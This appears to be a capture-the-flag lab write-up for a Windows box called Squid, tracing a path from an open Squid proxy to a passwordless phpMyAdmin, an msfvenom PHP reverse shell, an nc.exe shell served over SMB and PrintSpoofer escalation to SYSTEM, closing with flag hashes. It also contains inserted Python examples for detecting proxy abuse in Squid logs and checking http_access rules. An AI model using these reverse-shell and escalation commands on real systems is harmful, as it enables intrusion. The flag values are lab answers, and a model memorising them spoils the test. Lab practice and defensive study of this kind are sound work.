Nmap Results
# Nmap 7.92 scan initiated Thu Sep 1 17:05:22 2022 as: nmap -Pn -p- -A -T5 -oN scan.txt 192.168.57.189
Nmap scan report for 192.168.57.189
Host is up (0.079s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
3128/tcp open http-proxy Squid http proxy 4.14
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/4.14
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): AVtech embedded (87%), Microsoft Windows XP (85%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3
Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%), Microsoft Windows XP SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 3128/tcp)
HOP RTT ADDRESS
1 79.55 ms 192.168.49.1
2 79.77 ms 192.168.57.189
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 1 17:17:17 2022 -- 1 IP address (1 host up) scanned in 716.09 seconds
Service Enumeration
TCP/3128
Banner Grabbing
Try doing some banner grabbing:

This confirms the nmap fingerprint of Squid http proxy 4.14. Let's check Exploit DB for any version-specific vulnerabilities.
searchsploit squid
Proxy Testing
HTTP Proxy Testing
Nothing for this particular version in Exploit DB. I checked Google for some exploits as well, but I'm not seeing any remote exploits available.
I stumbled across this cheat sheet in my Googling, however.
The suggestion here is to point Kali at the Squid proxy and use it as a pivot point to internal services and/or ports.
Let's see what we can do.
curl --proxy http://192.168.57.189:3128 http://192.168.57.189

Testing Nmap Proxy
Looks like we got a Squid error on that request. Let's see if we can use it as an nmap proxy.
sudo nano /etc/proxychains4.conf
I've commented out my other proxy option and added the Squid proxy as an HTTP proxy.

Now, let's try an nmap scan. Since we're going through a proxy, we'll have to do a full SYN scan. I'm going to use the --top-ports option, since the full SYN scans can be quite slow.
proxychains -q nmap -Pn -sT -T4 --top-ports 1000 192.168.57.189
proxychains -q nmap -Pn -sT -T4 --top-ports 1000 localhost
Custom Proxy Port Scanning
All ports came back as ignored. We can also try the spose.py script here:
git clone https://github.com/aancw/spose
cd spose
python3 spose.py --proxy http://192.168.57.189:3128 --target 192.168.57.189
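The probing above (curl through the proxy, a proxychains nmap scan, spose.py) leaves a trail in Squid's access.log. As an added example, not code from this write-up, here is a small detector over constructed native-format log lines that flags clients reaching the proxy host's own or private addresses on many distinct ports, and any request for a phpMyAdmin path; the proxy address set and the log lines are assumptions.

```python
# Added example (not from the original write-up): spot proxy abuse in Squid's
# native access.log, i.e. the curl / proxychains / spose.py probing above as
# seen from the defender's side. Sample lines are constructed, not captured.
from collections import defaultdict
from urllib.parse import urlsplit
import ipaddress

PROXY_SELF = {"192.168.57.189", "127.0.0.1", "localhost"}  # assumed proxy addrs

# Native format: time elapsed client code/status bytes method URL ident peer type
SAMPLE_LOG = """\
1662051922.101 80 192.168.49.57 TCP_MISS/403 3812 GET http://192.168.57.189/ - HIER_NONE/- text/html
1662051925.340 12 192.168.49.57 TCP_MISS/503 3920 GET http://192.168.57.189:22/ - HIER_NONE/- text/html
1662051925.355  5 192.168.49.57 TCP_MISS/503 0 CONNECT 192.168.57.189:445 - HIER_NONE/- -
1662051925.371 15 192.168.49.57 TCP_MISS/502 1044 GET http://192.168.57.189:3306/ - HIER_DIRECT/192.168.57.189 text/html
1662051925.390 41 192.168.49.57 TCP_MISS/200 9215 GET http://192.168.57.189:8080/phpmyadmin/ - HIER_DIRECT/192.168.57.189 text/html
1662051990.002 60 192.168.49.80 TCP_MISS/200 5120 GET http://example.com/ - HIER_DIRECT/93.184.216.34 text/html
"""

def parse_line(line):
    """Client, destination host/port and path from one native-format line."""
    f = line.split()
    if len(f) < 10:
        return None
    if f[5] == "CONNECT":                      # CONNECT logs a bare host:port
        host, _, port = f[6].rpartition(":")
        return {"client": f[2], "host": host, "port": int(port), "path": ""}
    u = urlsplit(f[6])
    port = u.port or (443 if u.scheme == "https" else 80)
    return {"client": f[2], "host": u.hostname or "", "port": port, "path": u.path}

def is_internal(host):
    """True for the proxy itself, loopback, or private address space."""
    if host in PROXY_SELF:
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:                         # hostname: not an IP literal
        return False
    return addr.is_loopback or addr.is_private

def analyse(log_text, scan_threshold=3):
    """Clients hitting >= threshold distinct internal ports, plus phpMyAdmin hits."""
    ports, admin_hits = defaultdict(set), []
    for rec in filter(None, map(parse_line, log_text.splitlines())):
        if not is_internal(rec["host"]):
            continue
        ports[rec["client"]].add(rec["port"])
        if "phpmyadmin" in rec["path"].lower():
            admin_hits.append((rec["client"], rec["host"], rec["port"]))
    scanners = {c: sorted(p) for c, p in ports.items() if len(p) >= scan_threshold}
    return {"scanners": scanners, "admin_hits": admin_hits}
```

Running analyse(SAMPLE_LOG) reports 192.168.49.57 reaching five distinct internal ports and one phpMyAdmin request, while the client that only browsed example.com is not reported.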

Testing the Proxied Services
Setting the Proxy
I am using this proxy switcher in my browser. From here, I can set the Squid proxy and navigate to the pages.

TCP/8080

The phpMyAdmin service looks interesting; let's take a look and see if there's a guessable password on that service.

Turns out, the service is configured to allow passwordless login for the root user.

Exploit
Details
Squid, acting as a reverse proxy, allows unauthenticated access to an internal WAMP server and phpMyAdmin interface. The phpMyAdmin interface is configured with passwordless login for the root user, allowing an attacker to create files in the web root, which can lead to code execution.
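A defender's check for the misconfiguration just described, added here and not taken from the write-up (the box's actual squid.conf is never shown): a first-match evaluator for Squid's http_access lines, run against a constructed permissive config and a constructed hardened one that denies requests to loopback and to the proxy's own address. The acl names, addresses and both configs are assumptions.

```python
# Added example, not the box's real squid.conf (the write-up never shows it):
# a first-match evaluator for Squid http_access rules that checks whether a
# config lets an outside client reach the proxy host's own services.
import ipaddress

# Constructed configs: the exposure described above, and a restrictive one.
WEAK_CONF = "http_access allow all\n"          # anyone, to anywhere, any port
HARDENED_CONF = """\
acl localnet src 192.168.0.0/16
acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 ::1
acl to_self dst 192.168.57.189/32
acl Safe_ports port 80 443
http_access deny to_localhost
http_access deny to_self
http_access deny !Safe_ports
http_access allow localnet
http_access deny all
"""

def parse_conf(text):
    """acl name -> (type, values), plus http_access rules in file order."""
    acls, rules = {"all": ("src", ["0.0.0.0/0", "::/0"])}, []   # built-in 'all'
    for raw in text.splitlines():
        w = raw.split("#", 1)[0].split()
        if w[:1] == ["acl"]:
            acls.setdefault(w[1], (w[2], []))[1].extend(w[3:])
        elif w[:1] == ["http_access"]:
            rules.append((w[1], w[2:]))
    return acls, rules

def _matches(acls, token, req):
    kind, values = acls[token.lstrip("!")]     # leading '!' negates, as in Squid
    if kind in ("src", "dst"):
        addr = ipaddress.ip_address(req[kind])
        nets = [ipaddress.ip_network(v, strict=False) for v in values]
        hit = any(n.version == addr.version and addr in n for n in nets)
    elif kind == "port":                         # single ports or lo-hi ranges
        hit = any(int(lo) <= req["port"] <= int(hi or lo)
                  for lo, _, hi in (v.partition("-") for v in values))
    else:
        raise ValueError(f"acl type {kind!r} is not modelled here")
    return hit != token.startswith("!")

def http_access(conf, src, dst, port):
    """First matching line wins; no match -> opposite of the last line's action."""
    acls, rules = parse_conf(conf)
    req = {"src": src, "dst": dst, "port": port}
    for action, tokens in rules:
        if all(_matches(acls, t, req) for t in tokens):
            return action == "allow"
    return bool(rules) and rules[-1][0] == "deny"
```

With WEAK_CONF a client at 192.168.49.57 is allowed through to 192.168.57.189:8080; with HARDENED_CONF that request, and any request to 127.0.0.1, is denied while ordinary web traffic on ports 80 and 443 from the local network still passes.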
PhpMyAdmin to File Upload

In the phpMyAdmin interface, you can click on the SQL tab and run the suggested payload to create an uploader.php file in the web root.

From here, you can create a PHP reverse shell payload and upload it via this web form. That will upload your reverse shell file to the web root.
Reverse Shell
Create a reverse shell payload and upload it using the web form.
msfvenom -p php/reverse_php LHOST=192.168.49.57 LPORT=443 -f raw -o shell.php

Start a listener.
sudo rlwrap nc -lnvp 443
And open http://192.168.57.189:8080/shell.php in your browser or using curl.

Upgrade Your Shell
Copy nc.exe to your current directory and serve it using smbserver.py.
cp /usr/share/windows-resources/binaries/nc.exe .
smbserver.py -smb2support -username evil -password evil evil $PWD
Start a listener on another port.
sudo rlwrap nc -lnvp 80
Now, from your reverse shell, execute nc.exe by using the UNC path.
net use z: \\192.168.49.57\evil /user:evil evil
Z:\nc.exe 192.168.49.57 80 -e cmd.exe

Post-Exploit Enumeration
Current User
USER INFORMATION
----------------
User Name SID
========================== ========
nt authority\local service S-1-5-19
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ================================================================================================ ==================================================
Mandatory Label\System Mandatory Level Label S-1-16-16384
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
ERROR: Unable to get user claims information.
OS & Kernel
Host Name: SQUID
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-70000-00000-AA872
Original Install Date: 5/28/2021, 2:52:51 AM
System Boot Time: 7/13/2022, 9:49:25 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~3094 Mhz
BIOS Version: VMware, Inc. VMW71.00V.18227214.B64.2106252220, 6/25/2021
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 862 MB
Virtual Memory: Max Size: 2,431 MB
Virtual Memory: Available: 1,122 MB
Virtual Memory: In Use: 1,309 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 11 Hotfix(s) Installed.
[01]: KB5007295
[02]: KB4512577
[03]: KB4535680
[04]: KB4577586
[05]: KB4589208
[06]: KB5003243
[07]: KB5003711
[08]: KB5005112
[09]: KB5007206
[10]: KB5006754
[11]: KB5005701
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 192.168.57.189
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Users
User accounts for \\
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
WDAGUtilityAccount
Groups
Aliases for \\SQUID
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Storage Replica Administrators
*System Managed Accounts Group
*Users
The command completed successfully.
Network
Interfaces
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.57.189
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.57.254
ARP Table
N/A
Routes
N/A
Open Ports
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 876
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:3128 0.0.0.0:0 LISTENING 4824
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1860
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 1720
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 520
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 60
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1048
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1620
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:49672 0.0.0.0:0 LISTENING 656
TCP 192.168.57.189:139 0.0.0.0:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 876
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:3128 [::]:0 LISTENING 4824
TCP [::]:3306 [::]:0 LISTENING 1860
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:8080 [::]:0 LISTENING 1720
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 520
TCP [::]:49665 [::]:0 LISTENING 60
TCP [::]:49666 [::]:0 LISTENING 1048
TCP [::]:49667 [::]:0 LISTENING 1620
TCP [::]:49668 [::]:0 LISTENING 640
TCP [::]:49672 [::]:0 LISTENING 656
Ping Sweep
N/A
Processes
No interesting processes.
Services
No interesting services, unquoted service paths.
Scheduled Tasks
N/A
Privilege Escalation
After a lengthy round of enumeration, I could not find any privileged services that could lead to a local privilege escalation. So, I turned to Google and came across this very informative blog post.

The author has developed a local exploit that will streamline the process of regaining all of the privileges that service accounts used to come with.
After running the exploit, our service account now has SeImpersonatePrivilege enabled.

From here, I Googled for SeImpersonatePrivilege to SYSTEM.

Again, itm4n with the good stuff.
I host PrintSpoofer64.exe on the smbserver.py share from before and execute it.

Flags
C:\local.txt
6e071bbf55ee86b2c1691a3a8ae47c29
C:\Users\Administrator\Desktop\proof.txt
657c9d2fb8898397fbffbffba1a42e7a